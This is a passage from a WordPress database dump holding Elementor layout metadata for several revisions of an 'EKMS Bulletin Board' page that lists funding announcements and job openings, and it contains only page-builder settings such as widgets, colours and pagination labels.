More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29232,4121,'_elementor_pro_version','3.3.6'),(29233,4122,'_elementor_edit_mode','builder'),(29234,4122,'_elementor_template_type','wp-page'),(29235,4122,'_elementor_version','3.4.0'),(29236,4122,'_wp_page_template','default'),(29237,4122,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29239,4122,'_elementor_pro_version','3.3.6'),(29241,4123,'_elementor_edit_mode','builder'),(29242,4123,'_elementor_template_type','wp-page'),(29243,4123,'_elementor_version','3.4.0'),(29244,4123,'_wp_page_template','default'),(29245,4123,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29247,4123,'_elementor_pro_version','3.3.6'),(29248,4124,'_elementor_edit_mode','builder'),(29249,4124,'_elementor_template_type','wp-page'),(29250,4124,'_elementor_version','3.4.0'),(29251,4124,'_wp_page_template','default'),(29252,4124,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29254,4124,'_elementor_pro_version','3.3.6'),(29255,4125,'_elementor_edit_mode','builder'),(29256,4125,'_elementor_template_type','wp-page'),(29257,4125,'_elementor_version','3.4.0'),(29258,4125,'_wp_page_template','default'),(29259,4125,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(38597,4918,'_elementor_css','a:6:{s:4:\"time\";i:1770857774;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:20:{i:0;s:7:\"6a355d4\";i:1;s:7:\"55a3c39\";i:2;s:7:\"e5be318\";i:3;s:7:\"b743106\";i:4;s:7:\"b743106\";i:5;s:7:\"6a355d4\";i:6;s:7:\"55a3c39\";i:7;s:7:\"e5be318\";i:8;s:7:\"b743106\";i:9;s:7:\"b743106\";i:10;s:7:\"6a355d4\";i:11;s:7:\"55a3c39\";i:12;s:7:\"e5be318\";i:13;s:7:\"b743106\";i:14;s:7:\"b743106\";i:15;s:7:\"6a355d4\";i:16;s:7:\"55a3c39\";i:17;s:7:\"e5be318\";i:18;s:7:\"b743106\";i:19;s:7:\"b743106\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(29261,4125,'_elementor_pro_version','3.3.6'),(29263,4126,'_elementor_edit_mode','builder'),(29264,4126,'_elementor_template_type','wp-page'),(29265,4126,'_elementor_version','3.4.0'),(29266,4126,'_wp_page_template','default'),(29267,4126,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29269,4126,'_elementor_pro_version','3.3.6'),(29270,4127,'_elementor_edit_mode','builder'),(29271,4127,'_elementor_template_type','wp-page'),(29272,4127,'_elementor_version','3.4.0'),(29273,4127,'_wp_page_template','default'),(29274,4127,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29276,4127,'_elementor_pro_version','3.3.6'),(29277,4128,'_elementor_edit_mode','builder'),(29278,4128,'_elementor_template_type','wp-page'),(29279,4128,'_elementor_version','3.4.0'),(29280,4128,'_wp_page_template','default'),(29281,4128,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29283,4128,'_elementor_pro_version','3.3.6'),(29285,4129,'_elementor_edit_mode','builder'),(29286,4129,'_elementor_template_type','wp-page'),(29287,4129,'_elementor_version','3.4.0'),(29288,4129,'_wp_page_template','default'),(29289,4129,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More 